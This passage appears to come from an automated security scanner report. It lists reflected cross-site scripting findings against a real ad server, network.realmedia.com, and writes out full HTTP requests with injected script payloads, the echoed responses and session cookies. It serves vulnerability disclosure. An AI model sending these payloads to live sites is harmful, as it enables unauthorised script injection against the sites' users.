User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 258
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:03 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure31127"><script>alert(1)</script>5274148795f/L18/29991517/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?29991517" TARGET=_blank>

4.669. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e11df"><script>alert(1)</script>5466936ca41 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3e11df"><script>alert(1)</script>5466936ca41?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1309559056/Bottom3e11df"><script>alert(1)</script>5466936ca41/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.670. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf6c"><script>alert(1)</script>7f5cada5b68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia6cf6c"><script>alert(1)</script>7f5cada5b68/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:28 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia6cf6c"><script>alert(1)</script>7f5cada5b68/Retarget_Secure/1372372830/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.671. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d5d"><script>alert(1)</script>38bef79c455 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secured1d5d"><script>alert(1)</script>38bef79c455/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secured1d5d"><script>alert(1)</script>38bef79c455/L18/1392028664/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1392028664" TARGET=_blank>

4.672. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><script>alert(1)</script>7b109254dda was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3dd1c9"><script>alert(1)</script>7b109254dda?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1435493673/Bottom3dd1c9"><script>alert(1)</script>7b109254dda/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.673. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de561"-alert(1)-"681c7535723 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001de561"-alert(1)-"681c7535723 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:30 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1R10M5b|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:32 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "101155000010000511001de561"-alert(1)-"681c7535723";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.674. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e57b0"><script>alert(1)</script>f90cf47e664 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediae57b0"><script>alert(1)</script>f90cf47e664/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:24 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediae57b0"><script>alert(1)</script>f90cf47e664/Retarget_Secure/756431560/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.675. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44397"><script>alert(1)</script>fa6f22d1dba was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure44397"><script>alert(1)</script>fa6f22d1dba/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:29 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure44397"><script>alert(1)</script>fa6f22d1dba/L18/1974447086/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1974447086" TARGET=_blank>

4.676. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90c5"><script>alert(1)</script>c13f5dc77c7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3f90c5"><script>alert(1)</script>c13f5dc77c7?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:34 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/418268214/Bottom3f90c5"><script>alert(1)</script>c13f5dc77c7/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.677. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8130"-alert(1)-"538826cf67a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001a8130"-alert(1)-"538826cf67a HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:59 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5i|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:01 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "101155000010000511001a8130"-alert(1)-"538826cf67a";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.678. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6267"><script>alert(1)</script>8e69d18030e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediae6267"><script>alert(1)</script>8e69d18030e/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
